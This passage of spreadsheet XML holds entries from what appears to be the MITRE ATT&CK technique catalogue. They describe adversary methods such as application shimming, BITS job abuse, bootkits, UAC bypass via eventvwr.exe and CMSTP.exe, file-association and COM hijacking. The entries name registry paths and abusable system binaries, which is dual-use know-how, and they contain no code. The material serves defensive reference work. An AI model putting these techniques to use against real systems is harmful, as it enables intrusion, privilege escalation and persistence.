        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>10</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> The AppInit DLL functionality is disabled in Windows 8 and later versions when secure boot is enabled.</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>11</t>
    </r>
  </si>
  <si>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</si>
  <si>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</si>
  <si>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T1138</t>
  </si>
  <si>
    <r>
      <t>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t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>9</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>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t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Hooking</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> to redirect the code as necessary in order to communicate with the OS. A list of all shims currently installed by the default Windows installer (sdbinst.exe) is kept in:</t>
    </r>
  </si>
  <si>
    <t>%WINDIR%\AppPatch\sysmain.sdb</t>
  </si>
  <si>
    <t>hklm\software\microsoft\windows nt\currentversion\appcompatflags\installedsdb</t>
  </si>
  <si>
    <t>Custom databases are stored in:</t>
  </si>
  <si>
    <t>%WINDIR%\AppPatch\custom &amp; %WINDIR%\AppPatch\AppPatch64\Custom</t>
  </si>
  <si>
    <t>hklm\software\microsoft\windows nt\currentversion\appcompatflags\custom</t>
  </si>
  <si>
    <r>
      <t>To keep shims secure, Windows designed them to run in user mode so they cannot modify the kernel and you must have administrator privileges to install a shim. However, certain shims can be used to </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Bypass User Account Control</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> (UAC) (RedirectEXE), inject DLLs into processes (InjectDLL), disable Data Execution Prevention (DisableNX) and Structure Exception Handling (DisableSEH), and intercept memory addresses (GetProcAddress). Similar to </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Hooking</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>, utilizing these shims may allow an adversary to perform several malicious acts such as elevate privileges, install backdoors, disable defenses like Windows Defender, etc.</t>
    </r>
  </si>
  <si>
    <t>T1010</t>
  </si>
  <si>
    <t>Adversaries may attempt to get a listing of open application windows. Window listings could convey information about how the system is used or give context to information collected by a keylogger. In Mac, this can be done natively with a small AppleScript script.</t>
  </si>
  <si>
    <t>T1123</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</si>
  <si>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</si>
  <si>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T1131</t>
  </si>
  <si>
    <t>Windows Authentication Package DLLs are loaded by the Local Security Authority (LSA) process at system start. They provide support for multiple logon processes and multiple security protocols to the operating system.12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</si>
  <si>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T1119</t>
  </si>
  <si>
    <r>
      <t>Once established within a system or network, an adversary may use automated techniques for collecting internal data. Methods for performing this technique could include use of </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Scripting</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> to search for and copy information fitting set criteria such as file type, location, or name at specific time intervals. This functionality could also be built into remote access tools. This technique may incorporate use of other techniques such as </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>File and Directory Discovery</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> and </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Remote File Copy</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> to identify and move files.</t>
    </r>
  </si>
  <si>
    <t>T1020</t>
  </si>
  <si>
    <r>
      <t>Data, such as sensitive documents, may be exfiltrated through the use of automated processing or </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Scripting</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> after being gathered during </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Collection</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>. When automated exfiltration is used, other exfiltration techniques likely apply as well to transfer the information out of the network, such as </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Exfiltration Over Command and Control Channel</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> and </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Exfiltration Over Alternative Protocol</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>.</t>
    </r>
  </si>
  <si>
    <t>T1197</t>
  </si>
  <si>
    <r>
      <t>Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through Component Object Model (COM)</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>13</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>.</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>14</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>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r>
  </si>
  <si>
    <r>
      <t>The interface to create and manage BITS jobs is accessible through </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>PowerShell</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> </t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>14</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> and the </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>BITSAdmin</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> tool.</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>15</t>
    </r>
  </si>
  <si>
    <r>
      <t>Adversaries may abuse BITS to download, execute, and even clean up after malicious code. BITS tasks are self-contained in the BITS job database, without new files or registry modifications, and often permitted by host firewalls.</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>161718</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> BITS enabled execution may also allow </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Persistence</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> by creating long-standing jobs (the default maximum lifetime is 90 days and extendable) or invoking an arbitrary program when a job completes or errors (including after system reboots).</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>1916</t>
    </r>
  </si>
  <si>
    <r>
      <t>BITS upload functionalities can also be used to perform </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Exfiltration Over Alternative Protocol</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>.</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>16</t>
    </r>
  </si>
  <si>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</si>
  <si>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</si>
  <si>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T1067</t>
  </si>
  <si>
    <t>A bootkit is a malware variant that modifies the boot sectors of a hard drive, including the Master Boot Record (MBR) and Volume Boot Record (VBR).20</t>
  </si>
  <si>
    <t>Adversaries may use bootkits to persist on systems at a layer below the operating system, which may make it difficult to perform full remediation unless an organization suspects one was used and can act accordingly.</t>
  </si>
  <si>
    <t>Master Boot Record</t>
  </si>
  <si>
    <t>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code.21</t>
  </si>
  <si>
    <t>Volume Boot Record</t>
  </si>
  <si>
    <t>The MBR passes control of the boot process to the VBR. Similar to the case of MBR, an adversary who has raw access to the boot drive may overwrite the VBR to divert execution during startup to adversary code.</t>
  </si>
  <si>
    <t>T1217</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</si>
  <si>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</si>
  <si>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Browser bookmarks may also highlight additional targets after an adversary has access to valid credentials, especially Credentials in Files associated with logins cached by a browser.</t>
  </si>
  <si>
    <t>Specific storage locations vary based on platform and/or application, but browser bookmarks are typically stored in local files/databases.</t>
  </si>
  <si>
    <t>T1176</t>
  </si>
  <si>
    <r>
      <t>Browser extensions or plugins are small programs that can add functionality and customize aspects of internet browsers. They can be installed directly or through a browser's app store. Extensions generally have access and permissions to everything that the browser can access.</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>2223</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>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t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>24</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> Once the extension is installed, it can browse to websites in the background,</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>2526</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> steal all information that a user enters into a browser, to include credentials,</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>2728</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>and be used as an installer for a RAT for </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>persistence</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>. There have been instances of botnets using a persistent backdoor through malicious Chrome extensions.</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>29</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> There have also been similar examples of extensions being used for command &amp; control </t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>30</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>.</t>
    </r>
  </si>
  <si>
    <t>T1110</t>
  </si>
  <si>
    <t>Adversaries may use brute force techniques to attempt access to accounts when passwords are unknown or when password hashes are obtained.</t>
  </si>
  <si>
    <r>
      <t>Credential Dumping</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> to obtain password hashes may only get an adversary so far when </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Pass the Hash</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> is not an option. Techniques to systematically guess the passwords used to compute hashes are available, or the adversary may use a pre-computed rainbow table. Cracking hashes is usually done on adversary-controlled systems outside of the target network.</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>31</t>
    </r>
  </si>
  <si>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policies.32</t>
  </si>
  <si>
    <t>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passwords.33</t>
  </si>
  <si>
    <t>T1088</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</si>
  <si>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action.34</t>
  </si>
  <si>
    <r>
      <t>If the UAC protection level of a computer is set to anything but the highest level, certain Windows programs are allowed to elevate privileges or execute some elevated COM objects without prompting the user through the UAC notification box.</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>3536</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>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t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>37</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> Adversaries can use these techniques to elevate privileges to administrator if the target process is unprotected.</t>
    </r>
  </si>
  <si>
    <t>Many methods have been discovered to bypass UAC. The Github readme page for UACMe contains an extensive list of methods38 that have been discovered and implemented within UACMe, but may not be a comprehensive list of bypasses. Additional bypass methods are regularly discovered and some used in the wild, such as:</t>
  </si>
  <si>
    <r>
      <t>eventvwr.exe</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> can auto-elevate and execute a specified binary or script.</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>3940</t>
    </r>
  </si>
  <si>
    <r>
      <t>Another bypass is possible through some </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Lateral Movement</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> techniques if credentials for an account with administrator privileges are known, since UAC is a single system security mechanism, and the privilege or integrity of a process running on one system will be unknown on lateral systems and default to high integrity.</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>41</t>
    </r>
  </si>
  <si>
    <t>T1191</t>
  </si>
  <si>
    <t>The Microsoft Connection Manager Profile Installer (CMSTP.exe) is a command-line program used to install Connection Manager service profiles.42 CMSTP.exe accepts an installation information file (INF) as a parameter and installs a service profile leveraged for remote access connections.</t>
  </si>
  <si>
    <r>
      <t>Adversaries may supply CMSTP.exe with INF files infected with malicious commands.</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>43</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> Similar to </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Regsvr32</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> / ”Squiblydoo”, CMSTP.exe may be abused to load and execute DLLs</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>44</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> and/or COM scriptlets (SCT) from remote servers.</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>4546</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> This execution may also bypass AppLocker and other whitelisting defenses since CMSTP.exe is a legitimate, signed Microsoft application.</t>
    </r>
  </si>
  <si>
    <r>
      <t>CMSTP.exe can also be abused to </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Bypass User Account Control</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> and execute arbitrary commands from a malicious INF through an auto-elevated COM interface.</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>4446</t>
    </r>
  </si>
  <si>
    <t>T1042</t>
  </si>
  <si>
    <r>
      <t>When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access.</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>4748</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.</t>
    </r>
  </si>
  <si>
    <r>
      <t>System file associations are listed under </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Courier New"/>
        <family val="3"/>
      </rPr>
      <t>HKEY_CLASSES_ROOT\.[extension]</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>, for example </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Courier New"/>
        <family val="3"/>
      </rPr>
      <t>HKEY_CLASSES_ROOT\.txt</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>. The entries point to a handler for that extension located at </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Courier New"/>
        <family val="3"/>
      </rPr>
      <t>HKEY_CLASSES_ROOT\[handler]</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>. The various commands are then listed as subkeys underneath the shell key at </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Courier New"/>
        <family val="3"/>
      </rPr>
      <t>HKEY_CLASSES_ROOT\[handler]\shell\[action]\command</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>. For example:</t>
    </r>
  </si>
  <si>
    <t>HKEY_CLASSES_ROOT\txtfile\shell\open\command</t>
  </si>
  <si>
    <t>HKEY_CLASSES_ROOT\txtfile\shell\print\command</t>
  </si>
  <si>
    <t>HKEY_CLASSES_ROOT\txtfile\shell\printto\command</t>
  </si>
  <si>
    <t>The values of the keys listed are commands that are executed when the handler opens the file extension. Adversaries can modify these values to execute arbitrary commands.</t>
  </si>
  <si>
    <t>T1115</t>
  </si>
  <si>
    <t>Adversaries may collect data stored in the Windows clipboard from users copying information within or between applications.</t>
  </si>
  <si>
    <t>Applications can access clipboard data by using the Windows API.49</t>
  </si>
  <si>
    <t>OSX provides a native command, pbpaste, to grab clipboard contents 50.</t>
  </si>
  <si>
    <t>T1116</t>
  </si>
  <si>
    <r>
      <t>Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with.</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>51</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> However, adversaries are known to use code signing certificates to masquerade malware and tools as legitimate binaries</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>52</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>. The certificates used during an operation may be created, forged, or stolen by the adversary.</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>5354</t>
    </r>
  </si>
  <si>
    <t>Code signing to verify software on first run can be used on modern Windows and macOS/OS X systems. It is not used on Linux due to the decentralized nature of the platform.51</t>
  </si>
  <si>
    <t>Code signing certificates may be used to bypass security policies that require signed code to execute on a system.</t>
  </si>
  <si>
    <t>T1059</t>
  </si>
  <si>
    <r>
      <t>Command-line interfaces provide a way of interacting with computer systems and is a common feature across many types of operating system platforms.</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>55</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> One example command-line interface on Windows systems is </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>cmd</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>,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t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Scheduled Task</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>). Adversaries may use command-line interfaces to interact with systems and execute other software during the course of an operation.</t>
    </r>
  </si>
  <si>
    <t>T1043</t>
  </si>
  <si>
    <t>Adversaries may communicate over a commonly used port to bypass firewalls or network detection systems and to blend with normal network activity to avoid more detailed inspection. They may use commonly open ports such as</t>
  </si>
  <si>
    <t>TCP:80 (HTTP)</t>
  </si>
  <si>
    <t>TCP:443 (HTTPS)</t>
  </si>
  <si>
    <t>TCP:25 (SMTP)</t>
  </si>
  <si>
    <t>TCP/UDP:53 (DNS)</t>
  </si>
  <si>
    <t>They may use the protocol associated with the port or a completely different protocol.</t>
  </si>
  <si>
    <t>For connections that occur internally within an enclave (such as those between a proxy or pivot node and other nodes), examples of common ports are</t>
  </si>
  <si>
    <t>TCP/UDP:135 (RPC)</t>
  </si>
  <si>
    <t>TCP/UDP:22 (SSH)</t>
  </si>
  <si>
    <t>TCP/UDP:3389 (RDP)</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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1109</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</si>
  <si>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</si>
  <si>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T1122</t>
  </si>
  <si>
    <r>
      <t>The Microsoft Component Object Model (COM) is a system within Windows to enable interaction between software components through the operating system.</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>56</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>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t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>57</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> An adversary is likely to hijack objects that are used frequently enough to maintain a consistent level of persistence, but are unlikely to break noticeable functionality within the system as to avoid system instability that could lead to detection.</t>
    </r>
  </si>
  <si>
    <t>T1090</t>
  </si>
  <si>
    <r>
      <t>A connection proxy is used to direct network traffic between systems or act as an intermediary for network communications. Many tools exist that enable traffic redirection through proxies or port redirection, including </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>HTRAN</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>, ZXProxy, and ZXPortMap.</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>58</t>
    </r>
  </si>
  <si>
    <t>The definition of a proxy can also be expanded out to encompass trust relationships between networks in peer-to-peer, mesh, or trusted connections between networks consisting of hosts or systems that regularly communicate with each other.</t>
  </si>
  <si>
    <t>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</si>
  <si>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T1196</t>
  </si>
  <si>
    <r>
      <t>Windows Control Panel items are utilities that allow users to view and adjust computer settings. Control Panel items are registered executable (.exe) or Control Panel (.cpl) files, the latter are actually renamed dynamic-link library (.dll) files that export a CPlApplet function.</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>5960</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> Control Panel items can be executed directly from the command line, programmatically via an application programming interface (API) call, or by simply double-clicking the file.</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
